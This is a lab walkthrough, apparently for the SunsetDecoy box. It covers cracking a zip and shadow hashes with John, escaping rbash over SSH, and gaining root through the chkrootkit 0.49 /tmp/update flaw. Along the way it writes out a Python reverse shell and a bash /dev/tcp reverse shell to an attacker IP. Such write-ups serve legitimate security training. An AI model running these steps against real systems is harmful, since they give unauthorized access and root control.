# SunsetDecoy

## Nmap

```
sudo nmap 192.168.184.85 -p- -sS -sV                                                                                                                                                                                             130 ⨯

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

First up checking the root page for port 80 takes us to an index page containing a file called save.zip.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-99afb3fbd68b52e6d87e74e200f1be9dfb6224dc%2Fimage.png?alt=media)

Upon downloading the file we are asked for a password to open. Kali comes pre-installed with a `John` module called `zip2john`. We can use this to create a hash of the file which can be used for cracking with `John`.

```
/usr/sbin/zip2john /home/kali/Downloads/save.zip > /home/kali/Desktop/hash
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b9485556de05f36efc890383a43fecab298323b0%2Fimage.png?alt=media)

We can then run `John` against the hash.

```
sudo john --wordlist=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100000.txt /home/kali/Desktop/hash
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-fb9bbf6df6e397064fc7438a974f648be12d7fb6%2Fimage.png?alt=media)

We soon get the password `manuel`. We can then extract the contents of save.zip. After doing so we extract the /etc/ folder.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-019bcc64f90e5a32f11b11f18dbf34c0060ec43d%2Fimage.png?alt=media)

Out of these files shadow is of interest the most.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-66193a3e6bc17a9f402801f32e1f4b21d0d2c7f7%2Fimage.png?alt=media)

We have passwords hash for the root account and the account '296640a3b825115a47b68fc44501c828'. I was unable to crack the root password with a wordlist so instead was able to crack the other account as per below:

```
sudo john --wordlist=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100000.txt /home/kali/Desktop/hash
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-35f905c0d132d45869a32b7e9e1f7cd1febf31b7%2Fimage.png?alt=media)

We now have the password: `server` I was then able to login to `SSH` with the username and password.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-493231297a2e0d7d434f2cf01cf13dd3ae6c1f4b%2Fimage.png?alt=media)

When attempting to run a simple command such as cat we are given the error message: `-rbash: cat: command not found`.

To help bypass this we can exit out of SSH and reconnect with the following command:

```
ssh 296640a3b825115a47b68fc44501c828@192.168.184.85 -t "bash --noprofile"
```

Once in we have a more usable shell. We can then run a Python reverse shell to create another shell connection this should get us more usable.

```
/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.184",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'
```

Once in the new shell export a new path so we have use of commands easily.

```
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5b9faa856dc34ed785a048f8bead64db9de83200%2Fimage.png?alt=media)

After enumerating the machine for a while I was unable to find points of escalation. I then transferred over [pspy64](https://github.com/DominicBreuker/pspy/releases) and let it run.

```
chmod +x pspy64
./pspy64
```

Soon after running we get a huge amount of entries for chkrootkit-0.49.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2aa9390f32f8a7f97ae1201d8496af26dba58a08%2Fimage.png?alt=media)

Researching on Google shows a local privilege escalation exploit with this version and below:

{% embed url="<https://www.exploit-db.com/exploits/33899>" %}

Essentially this will execute a binary in /tmp/update. We can create update as a reverse shell and when executed should give us a root shell.

```
echo '#!/bin/bash
bash -i >& /dev/tcp/192.168.49.184/80 0>&1' > /tmp/update
```

Make it executable:

```
chmod +x /tmp/update
```

Then open a `netcat` listener to the specified port and we should land a root shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1554680ff633b84cd9dd2caac6798de6e41fb436%2Fimage.png?alt=media)